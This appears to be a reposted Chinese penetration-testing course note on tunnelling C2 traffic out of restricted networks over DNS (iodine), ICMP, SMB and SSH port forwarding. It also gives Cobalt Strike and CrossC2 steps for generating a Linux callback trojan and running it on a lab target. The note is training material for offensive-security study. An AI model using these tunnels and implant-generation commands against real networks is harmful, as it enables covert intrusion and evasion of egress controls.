内网安全Day5--隧道技术&SSH&DNS&ICMP&SMB
本日重要学习了如何利用DNS|SSH隧道技术来让linux&Mac&IOS&Android上线笔记部门:
1.判定出网协议
2.利用出网协议建立隧道
#SMB隧道&通讯&上线
判定:445通讯
上线:借助通讯后绑定上线
通讯:直接SMB协议通讯即可
#ICMP隧道&通讯&上线
判定:ping命令
上线:见前面课程
通讯:其他项目(icmp icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
#DNS隧道&通讯&上线
判定:nslookup dig
1.上线环境:内网主机只出网DNS协议数据,办理上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2.通讯环境:
内网主机只出网DNS协议数据,办理通讯
https://github.com/yarrick/iodine
判定出网:nslookup www.baidu.com
-服务器:设置暗码xiaodi 并创建虚拟IP及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置暗码xiaodi并创建虚拟IP及绑定域名指向
-客户端:毗连暗码xiaodi并绑定域名指向
iodine -f -M 200 -P xiaodi ns.xiaodi8.com
-实验通讯实验毗连:
ssh root@192.168.0.2
#SSH隧道&通讯
判定:SSH毗连
1.上线:
由于CS无SSH协议监听器配置,无法上线
2.通讯:
由于SSH协议存在Linux系统,跳板机必须Linux
iptables -F /*清除所有规则*/
iptables -A INPUT -p tcp --dport 22 -j ACCEPT/*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT/*域名分析端口,一般不打开*/
iptables -A INPUT -p udp --dport 53 -j ACCEPT/*域名分析端口,一般不打开*/
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save> /etc/sysconfig/iptables /*保存配置*/
iptables -L/*显示iptables列表*/
开启SSH协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:出站被封
ssh -cfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122
远程: 入站被封
ssh -cfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234
#控制上线-插件-Linux&Mac&IOS&Andriod
https://github.com/gloxec/CrossC2
面向Linux Mac IOS Andriod系统上线支持
1.插件利用
2.命令利用
利用参考:
https://gloxec.github.io/CrossC2/zh_cn
1.下载对应版本加载器和CNA插件
2.上传加载器文件和本地加载CNA插件
3.修改CNA插件配置路径及上传Key文件
4.利用命令或插件绑定HTTPS监听器生成
实验部门:
实验1:DNS隧道技术上线
https://i-blog.csdnimg.cn/direct/6987f82d0225433dbde858b423dd65ff.png
阿里云有域名的兄弟可以试一下这个操作:
先在阿里云域名分析页添加几个记录值:
1.A-cs(主机记录)--默认(分析线路)--记录值:(本身CS的服务器地址)
https://i-blog.csdnimg.cn/direct/28e33489e86b4908ba1df9b034eb42ac.png
2.添加NS记录:
NS1-默认线路--记录值:cs.xiaosedi123.fun
https://i-blog.csdnimg.cn/direct/86c6829ba40c44a19fbef014cb0260b1.png
第二条ns:
NS -ns2(主机记录)--默认线路--记录值:cs.xiaodi123.fun
https://i-blog.csdnimg.cn/direct/18aa996d474f42ad8403918b54840fcc.png
原理:
当访问ns1.xiaosedi123.fun时分析为 cs.xiaosedi123.fun
ns2.xiaosedi123.fun时分析为cs.xiaosedi123.fun
访问cs.xiaosedi123.fun时分析为47.94.236.117
然后打开cs的服务端和客户端:
创建监听器:
https://i-blog.csdnimg.cn/direct/a930f9a5a5664aab82222912d01d1ab3.png
创建后门:
https://i-blog.csdnimg.cn/direct/111ceb434c3744e0bd7b84686906cca7.png
https://i-blog.csdnimg.cn/direct/7a30afe0bc23489baa2540b878e6409a.png
转移到windows靶机上双击运行:
https://i-blog.csdnimg.cn/direct/1411f792f55d4e609c494314d2986875.png
可以看到出现一条黑框,跟我们之间遇到的主机上线的步骤不一样。
这里进入命令行交互页面。
https://i-blog.csdnimg.cn/direct/7006479bef004dc086a98f1149643918.png
敲下这个命令,调整心跳间隙,稍等一下就会酿成之前的样子
https://i-blog.csdnimg.cn/direct/7874c982f6df4af8b580906c7a246bf9.png
实验1(2):DNS通讯环境:
内网主机只出网DNS协议数据,办理通讯
https://github.com/yarrick/iodine
判定出网:nslookup www.baidu.com
--服务器端:设置暗码xiaodi并创建虚拟IP及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1(恣意写一个局域网) ns1.xiaodi8.com(前面设置的域名) -DD
设置暗码xiaodi并创建虚拟IP及绑定域名指向
-客户端:毗连暗码xiaodi并绑定域名指向
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com(会在自身电脑上安装一个网卡,跟192.168.0.1处在同一个局域网中)
-实验通讯实验毗连:
ssh root@192.168.0.2
实验2:SSH隧道&通讯
实验环境:
https://i-blog.csdnimg.cn/direct/1c3b72f9584e4e01917c01e3a90f393c.png
实验条件,必须使linux为跳板主机。linux必须为最高权限。
个人实验环境:
https://i-blog.csdnimg.cn/direct/7944bfe615b14eeebbbb1a252c59e70b.png
首先须要在kali和Ubuntu上安装ssh服务:
ubuntu安装ssh:如何在Ubuntu上开启SSH服务 并开机启动_ubuntu ssh 开机启动-CSDN博客
kali安装ssh:Kali安装ssh服务-CSDN博客
在windows10上安装hfs服务器:Release 0.54.0 · rejetto/hfs
当linux上设置防火入站规则只允许22端口流量通过的时候:
利用远程举行反向毗连:
在ubuntu上敲下如下命令,并输入本身kaliVPS的暗码
ssh -CfNg -R 1234:192.168.3.130:8080 root@192.168.164.134(将本地的访问3.130 80的端口流量转发至192.168.164.134 1234)
https://i-blog.csdnimg.cn/direct/ea79a88a2ea34c9aa1c6b6ae16b62bdd.png
VPS输入:
curl http://127.0.0.1 1234
https://i-blog.csdnimg.cn/direct/5e28db7933514df58ab0fb0f668cf020.png
本地 出站 走正向:
将本地访问1.16 8080端口流量转发至本地的1122端口
在Ubuntu中敲下如下命令:
ssh -CfNg -L 1122:192.168.3.130:8080 root@192.168.164.134
https://i-blog.csdnimg.cn/direct/05406568c858452a9088122e6b89482f.png
实验3:linux&Mac的CS上线
强调:CS必须为4.1~4.9版本
首先下载,安装CrossC2插件:
Releases · gloxec/CrossC2
https://i-blog.csdnimg.cn/direct/4c9f1aaa611a4e91984fb5cada1305b4.png
这些都要下载到本地
然后根据CS服务器的版本,去复制对应的操作系统版本。
这里我用的Kali来当作本身的虚拟机,将linux版本复制到相应的CS服务器文件夹中:
https://i-blog.csdnimg.cn/direct/cf69991f37ba4d81a4f212767c97db8a.png
重新启动CS:
./teamserver 192.168.164.6 123456
然后将
https://i-blog.csdnimg.cn/direct/cc11520738c349ee9f5338bc814e4f81.png
这个压缩包里的两个cna以及下面这个cna通通加载到插件中:
https://i-blog.csdnimg.cn/direct/4d4c0ac830844643822b58a7d44fc70d.png
编辑整个cna:
https://i-blog.csdnimg.cn/direct/5df1ed8521584611942c0c7cec05e165.png
设置CC2_PATH='' (本身CS服务端的根目录)"
CC2_BIN="genCrossC2.Linux"(根据本身的实际情况编写)
保存后再导入插件:
https://i-blog.csdnimg.cn/direct/02ba3daa96634c06ba9acab611ec2500.png
首先创建一个监听器:
https://i-blog.csdnimg.cn/direct/cad67e48b73945e1af11c3e2b11293cc.png
木马的生成:
目前版本只支持反向的https和正向的tcp毗连
https://i-blog.csdnimg.cn/direct/e85f39e139d94e4f9ded47dd0bc02301.png
https://i-blog.csdnimg.cn/direct/4bccaa7ec6c14d8e9f12899905cc81ff.png
/root/CS4-7/genCrossC2.Linux 192.168.164.6 5555 ./.cobaltstrike.beacon_keys null Linux x64 1.out
https://i-blog.csdnimg.cn/direct/f0b0f3dd7ca54482b7187022e4e3ad61.png
将这条命令转移到虚拟机中去执行,可以得到1.out
https://i-blog.csdnimg.cn/direct/e3903618aa824727a8de86afccf6aef8.png
将1.out转移到Ubuntu靶机中去执行,可以发现木立刻线:
留意:利用sudo chmod +x 1.out 然后再双击执行:
https://i-blog.csdnimg.cn/direct/44b017688caf425286136e8e6ae4e6b2.png
至此,文章竣事。
实验4: 利用MSF使安卓上线:
https://i-blog.csdnimg.cn/direct/2333af33cd3a4ae8ae9d9e31ebf906eb.png
Kali利用MSF渗透安卓手机_kali入侵安卓手机-CSDN博客
可以参考这篇博客。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]